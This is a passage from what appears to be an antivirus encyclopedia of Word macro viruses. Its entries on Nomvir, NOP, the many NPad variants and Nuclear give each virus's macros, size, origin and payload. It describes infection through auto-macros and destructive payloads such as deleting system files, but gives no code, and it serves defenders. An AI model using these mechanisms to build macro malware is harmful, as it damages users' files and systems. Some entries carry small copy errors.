Nomvir infects the global template (normal.dot) when a new document is created (AutoNew) or Microsoft Word is started (AutoExec). Further documents become infected when they are saved with the DateiSpeichern or DateiSpeichernUnter command. Nomvir includes various destructive payloads. It tries to replace words with the word "hell", deletes C:\Autoexec.bat and C:\Config.sys, or adds the following text at the end of a document: " Fuck Microsoft & Bill Gates " Other payloads are activated on the 23rd of each month, Saturday 13th, January 1st and December 25th. On these days it tries to delete the following files: " C:\WINDOWS\USER.DAT " " C:\WINDOWS\USER.DA0 " " C:\WINDOWS\SYSTEM.DA0 " " C:\WINDOWS\SYSTEM.DAT " Novir.A does not activate its payloads if it finds the following entry in the "Compatibility" section of WINI.INI: Nomvir=0x0690690" The following message is displayed when the Tools/Macro menu is selected: " Nicht genⁿgend Arbeitsspeicher ! " (translated: Not enough memory) Another message is displayed when the "DateiDokvorlagen" menu is selected: " Interner Fehler ! " (translated: Internal Error) [WORD_Nomvir.B:De] Virus name: WORD_Nomvir.B:De Virus Type: Word macro virus Number of macros: 10 Encrypted: Yes Macro names: AutoExec, AutoNew, AutoOpen, DateiSpeichern, DateiSpeichernUnter, DateiBeenden, ExtrasOptionen, DateiDokvorlagen, DateiDrucken, FuckIt, Size of macros: 5660 Bytes Place of origin: Germany Date of origin: January 1997 Payload: Yes Seen In-The-Wild: No Description: Nomvir.B infects the global template (normal.dot) when a new document is created (AutoNew) or Microsoft Word is started (AutoExec). Further documents become infected when they are saved with the DateiSpeichern or DateiSpeichernUnter command. The main difference between this new variant and the "A" variant is that the "DateiDrucken" and "DateiBeenden" macros are not corrupted anymore. DateiBeenden (translated: FileClose) is responsible for another new payload. With a chance of 20 percent, Nomvir.B adds a password to the active document. This password is made up of 5 characters (iATeS) and another 6th character that is randomly chosen. For more information, please refer to the Nomvir.A virus description. [WORD_Nop.A:De] Virus name: WORD_Nop.A:De Virus Type: Word macro virus Number of macros: 2 Encrypted: No Macro names: AutoOpen, NOP (DateiSpeichern) Size of macros: 246 Bytes Place of origin: Germany Date of origin: Summer 1996 Destructive: No Common In-The-Wild: Yes Description: NOP.A is a very primitive virus and has only very few necessary commands in order to replicate. The only special characteristic for the NOP virus is that it turns off the prompting of Word before saving the global template (NORMAL.DOT). When an infected document is opened, NOP transfers itself to the global template and renames "NOP" into "DateiSpeichern". Additional documents become infected when they are saved. [WORD_Nop.B:De] Virus name: WORD_Nop.B:De Virus Type: Word macro virus Number of macros: 2 Encrypted: No Macro names: AutoOpen, NOP (DateiSpeichern) Size of macros: 250 Bytes Place of origin: Germany Date of origin: Summer 1996 Destructive: No Common In-The-Wild: No Description: The difference between the this new variant and NOP.A is that NOP.B does not turn off the prompting of Microsoft Word before saving the global template (normal.dot). It also enters the word "Testvirus" at the insertion point. For more information, please refer to the NOP.A virus. [WORD_NOP.D] Virus name: WORD_NOP.D Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen, NOP Size of macros: 234 Bytes Place of origin: USA Date of origin: January 1997 Destructive: No Common In-The-Wild: No Description: NOP.D is a new variant based on the original Nop.A virus. The only difference between the two viruses is that NOP.D is able to infect the English version of Microsoft Word, while NOP.A only works with the German version. For more information, please refer to the NOP.A virus. [WORD_NPad.A (DOEUNPAD)] Virus name: WORD_NPad.A (DOEUNPAD) Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Bandung, Indonesia Date of origin: March 1996 Payload: Yes Common In-The-Wild: Yes Description: NPad activates when an infected document is opened (AutoOpen). NPad.A also modifies the "compatibility" section inside the WIN.INI file. It adds a counter under the name of "NPAD328" and each time the virus is activated, it adds 1 to its value. Upon reaching a value of 23 it resets the counter and displays the following message in the status bar: " DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia " [WORD_NPad.B] Virus name: WORD_NPad.B Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Bandung, Indonesia Date of origin: March 1996 Destructive: No Seen In-The-Wild: No Description: The difference between this new variant and the original NPad virus is that some bytes have been patched in the macro virus code. The result of the change is an invalid instruction. NPad.B is able to infect the global template and further documents, yet upon reaching the invalid part of the macro code, it displays a syntax error message. The message from the original NPad virus is never displayed. [WORD_NPad.C] Virus name: WORD_NPad.C Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: January 1997 Destructive: No Seen In-The-Wild: No Description: NPad.C is a minor variant based on the older NPad.A virus. The only difference between the two viruses is that NPad.C is a corrupted variant, with some bytes being patches from the NPad.A virus. As a result of the corruption, NPad.C only executes some of its virus code. Infection of the global template and further documents still works, yet NPad.C never displays the scrolling message from the original NPad.A virus. Instead it displays a WordBasic error message. [WORD_NPad.D] Virus name: WORD_NPad.D Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Indonesia Date of origin: January 1997 Destructive: No Seen In-The-Wild: No Description: NPad.D is a minor variant based on the older NPad.A virus. The only difference between the two viruses is that NPad.D is a corrupted variant, with some bytes being patches from the NPad.A virus. As a result of the corruption, NPad.D only executes some of its virus code. Infection of the global template and further documents still works, yet NPad.D never displays the scrolling message from the original NPad.A virus. Instead it displays a WordBasic error message. [WORD_NPad.E] Virus name: WORD_NPad.E Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: January 1997 Destructive: No Seen In-The-Wild: No Description: NPad.E is a minor variant based on the older NPad.A virus. The only difference between the two viruses is that NPad.E is a corrupted variant, with some bytes being patches from the NPad.A virus. As a result of the corruption, NPad.E only executes some of its virus code. Infection of the global template and further documents still works, yet NPad.E never displays the scrolling message from the original NPad.A virus. Instead it displays a WordBasic error message. [WORD_NPad.F] Virus name: WORD_NPad.F Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: January 1997 Destructive: No Seen In-The-Wild: No Description: NPad.F is a minor variant based on the older NPad.A virus. The only difference between the two viruses is that NPad.F is a corrupted variant, with some bytes being patches from the NPad.A virus. As a result of the corruption, NPad.F only executes some of its virus code. Infection of the global template and further documents still works, yet NPad.F never displays the scrolling message from the original NPad.A virus. Instead it displays a WordBasic error message. [WORD_NPad.G] Virus name: WORD_NPad.G Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: January 1997 Destructive: No Seen In-The-Wild: No Description: NPad.G is a minor variant based on the older NPad.A virus. The only difference between the two viruses is that NPad.G is a corrupted variant, with some bytes being patches from the NPad.A virus. As a result of the corruption, NPad.G only executes some of its virus code. Infection of the global template and further documents still works, yet NPad.G never displays the scrolling message from the original NPad.A virus. Instead it displays a WordBasic error message. [WORD_NPad.I] Virus name: WORD_NPad.I Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: January 1997 Destructive: No Seen In-The-Wild: No Description: NPad.I is a minor variant based on the older NPad.A virus. The only difference between the two viruses is that NPad.I is a corrupted variant, with some bytes being patches from the NPad.A virus. As a result of the corruption, NPad.I only executes some of its virus code. Infection of the global template and further documents still works, yet NPad.I never displays the scrolling message from the original NPad.A virus. Instead it displays a WordBasic error message. [WORD_NPad.M] Virus name: WORD_NPad.M Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: No Seen In-The-Wild: No Description: NPad.I is a minor variant based on the older NPad.A virus. The only difference between the two viruses is that NPad.I is a corrupted variant, with some bytes being patches from the NPad.A virus. As a result of the corruption, NPad.I only executes some of its virus code. Infection of the global template and further documents still works, yet NPad.I never displays the scrolling message from the original NPad.A virus. Instead it displays a WordBasic error message. [WORD_NPad.AB] Virus name: WORD_NPad.AB Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AB has some minor code modifications. NPad.AB modifies the "compatibility" section inside the WIN.INI file. It adds a counter under the name of "NPAD328" and each time the virus is activated, it adds 1 to its value. Upon reaching a value of 23 it resets the counter and displays the following message in the status bar: " DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia " It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.AD] Virus name: WORD_NPad.AD Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AD has some corrupted codes. As a result of the corruption, NPad.AD only executes some of its virus codes. Npad.AD infects the global template (normal.dot) when an infected document in opened. Further documents become infected when they are also opened. [WORD_NPad.AE] Virus name: WORD_NPad.AE Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AE has some corrupted codes. As a result of the corruption, NPad.AE only executes some of its virus codes. Npad.AE infects the global template (normal.dot) when an infected document in opened. Further documents become infected when they are also opened. [WORD_NPad.AF] Virus name: WORD_NPad.AF Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AF has some minor code modifications and a corrupted counter. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.AG] Virus name: WORD_NPad.AG Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AG has some corrupted codes. As a result of the corruption, NPad.AG only executes some of its virus codes. Npad.AG infects the global template (normal.dot) when an infected document in opened. Further documents become infected when they are also opened. [WORD_NPad.AH] Virus name: WORD_NPad.AH Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AH has some corrupted codes. As a result of the corruption, NPad.AH only executes some of its virus codes. Npad.AH infects the global template (normal.dot) when an infected document in opened. Further documents become infected when they are also opened. [WORD_NPad.AI] Virus name: WORD_NPad.AI Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AI has some corrupted codes. As a result of the corruption, NPad.AI only executes some of its virus codes. Npad.AI infects the global template (normal.dot) when an infected document in opened. Further documents become infected when they are also opened. [WORD_NPad.AJ] Virus name: WORD_NPad.AJ Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AJ has some corrupted codes. As a result of the corruption, NPad.AJ only executes some of its virus codes. Npad.AJ infects the global template (normal.dot) when an infected document in opened. Further documents become infected when they are also opened. [WORD_NPad.AK] Virus name: WORD_NPad.AK Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AK has some minor code modifications. NPad.AK modifies the "compatibility" section inside the WIN.INI file. It adds a counter under the name of "NPAD328" and each time the virus is activated, it adds 1 to its value. Upon reaching a value of 23 it resets the counter and displays the following message in the status bar: " DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia " It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.AM] Virus name: WORD_NPad.AM Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AM has some corrupted codes. As a result of the corruption, NPad.AM only executes some of its virus codes. Npad.AM infects the global template when an infected document in opened. Further documents become infected when they are also opened. [WORD_NPad.AN] Virus name: WORD_NPad.AN Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Switzerland Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AN has some corrupted codes. As a result of the corruption, NPad.AN only executes some of its virus codes. Npad.AN infects the global template (normal.dot) when an infected document in opened. Further documents become infected when they are also opened. [WORD_NPad.AO] Virus name: WORD_NPad.AO Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AO has some minor code modifications. NPad.AO modifies the "compatibility" section inside the WIN.INI file. It adds a counter under the name of "NPAD328" and each time the virus is activated, it adds 1 to its value. Upon reaching a value of 23 it resets the counter and displays the following message in the status bar: " DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia " It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.AP] Virus name: WORD_NPad.AP Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AP has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.AP only executes some of its virus codes. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.AQ] Virus name: WORD_NPad.AQ Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AQ has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.AQ only executes some of its virus codes. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Npad.AS] Virus name: WORD_NPad.AS Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AS has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.AS only executes some of its virus codes. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.AU] Virus name: WORD_NPad.AU Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Australia Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AU has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.AU only executes some of its virus codes. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Npad.AV] Virus name: WORD_NPad.AV Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AV has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.AV only executes some of its virus codes. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_Npad.AW] Virus name: WORD_NPad.AW Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Netherlands Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AW has a one-byte code modification. NPad.AW modifies the "compatibility" section inside the WIN.INI file. It adds a counter under the name of "NPAD328" and each time the virus is activated, it adds 1 to its value. Upon reaching a value of 23 it resets the counter and displays the following message in the status bar: " DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia " It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.AX] Virus name; WORD_NPad.AX Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AX has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.AX only executes some of its virus codes. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.AY] Virus Name: WORD_NPad.AY Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AY has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.AY only executes some of its virus codes. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.AZ] Virus name: WORD_NPad.AZ Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.AZ has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.AZ only executes some of its virus codes. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.BA] Virus name: WORD_NPad.BA Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.BA has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.BA only executes some of its virus codes. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.BC] Virus name: WORD_NPad.BC Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Australia Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.BC has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.BC only executes some of its virus codes. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.BD] Virus name: WORD_NPad.BD Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.BD has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.BD only executes some of its virus codes. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.BE] Virus name: WORD_NPad.BE Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.BE has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.BE only executes some of its virus codes. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.BF] Virus name: WORD_NPad.BF Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.BF has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.BF only executes some of its virus codes. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.BG] Virus name: WORD_NPad.BG Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.BG has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.BG only executes some of its virus codes. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.BI] Virus name: WORD_NPad.BI Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.BI has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.BI only executes some of its virus codes. Infection of the global template occurs when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.H] Virus name: WORD_NPad.H Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.H has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.H only executes some of its virus codes. Infection of the global template and further documents still works, yet NPad.H never displays the scrolling message from the original NPad.A virus. [WORD_NPad.J] Virus name: WORD_NPad.J Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.J has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.J only executes some of its virus codes. Infection of the global template and further documents still works, yet NPad.J never displays the scrolling message from the original NPad.A virus. [WORD_NPad.K] Virus name: WORD_NPad.K Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.K has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.K only executes some of its virus codes. Infection of the global template and further documents still works, yet NPad.K never displays the scrolling message from the original NPad.A virus. [WORD_NPad.L] Virus name: WORD_NPad.L Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.L has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.L only executes some of its virus codes. Infection of the global template and further documents still works, yet NPad.L never displays the scrolling message from the original NPad.A virus. [WORD_NPad.O] Virus name: WORD_NPad.O Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.O has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.O only executes some of its virus codes. Infection of the global template and further documents still works, yet NPad.O never displays the scrolling message from the original NPad.A virus. [WORD_NPad.P] Virus name: WORD_NPad.P Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.P has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.P only executes some of its virus codes. Infection of the global template and further documents still works, yet NPad.P never displays the scrolling message from the original NPad.A virus. [WORD_NPad.Q] Virus name: WORD_NPad.Q Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.Q has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.Q only executes some of its virus codes. Infection of the global template and further documents still works, yet NPad.Q never displays the scrolling message from the original NPad.A virus. [WORD_NPad.R] Virus name: WORD_NPad.R Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.R has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.Q only executes some of its virus codes. Infection of the global template and further documents still works, yet NPad.R never displays the scrolling message from the original NPad.A virus. [WORD_NPad.S] Virus name: WORD_NPad.S Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.S has some minor code modifications. NPad.S modifies the "compatibility" section inside the WIN.INI file. It adds a counter under the name of "NPAD328" and each time the virus is activated, it increments this counter. Upon reaching a value of 23 it resets the counter and displays the following message in the status bar: " DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia " It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.T] Virus name: WORD_NPad.T Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.T has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.T only executes some of its virus codes. Infection of the global template and further documents still works, yet NPad.T never displays the scrolling message from the original NPad.A virus. [WORD_NPad.U] Virus name: WORD_NPad.U Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.U has some minor code modifications. NPad.U modifies the "compatibility" section inside the WIN.INI file. It adds a counter under the name of "NPAD328" and each time the virus is activated, it adds 1 to the counter. Upon reaching a value of 23 it resets the counter and displays the following message in the status bar: " DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia " It infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). [WORD_NPad.V] Virus name: WORD_NPad.V Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.V has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.V only executes some of its virus codes. Infection of the global template and further documents still works, yet NPad.V never displays the scrolling message from the original NPad.A virus. [WORD_NPad.W] Virus name: WORD_NPad.W Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.W has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.W only executes some of its virus codes. Infection of the global template and further documents still works, yet NPad.W never displays the scrolling message from the original NPad.A virus. [WORD_NPad.X] Virus name: WORD_NPad.X Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.X has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.X only executes some of its virus codes. Infection of the global template and further documents still works, yet NPad.X never displays the scrolling message from the original NPad.A virus. [WORD_NPad.Y] Virus name: WORD_NPad.Y Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.Y has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.Y only executes some of its virus codes. Infection of the global template and further documents still works, yet NPad.Y never displays the scrolling message from the original NPad.A virus. [WORD_NPad.Z] Virus name: WORD_NPad.Z Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1831 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and previous NPad viruses is that NPad.Z has some minor code modifications and a corrupted payload. As a result of the corruption, NPad.Z only executes some of its virus codes. Infection of the global template and further documents still works, yet NPad.Z never displays the scrolling message from the original NPad.A virus. [WORD_Nuclear.A(a.k.a. Alert)] Virus name: WORD_Nuclear.A (a.k.a. Alert) Virus Type: Word macro virus Number of macros: 9 Encrypted: Yes Macro names: AutoExec, AutoOpen, DropSuriv, FileExit, FilePrint, FilePrintDefault, FileSaveAs, InsertPayload, Payload Size of macros: 10556 Bytes Place of origin: Australia Date of origin: September 1995 Destructive: Yes Common In-The-Wild: Yes Description: Nuclear was the second macro virus found "In-the-Wild" 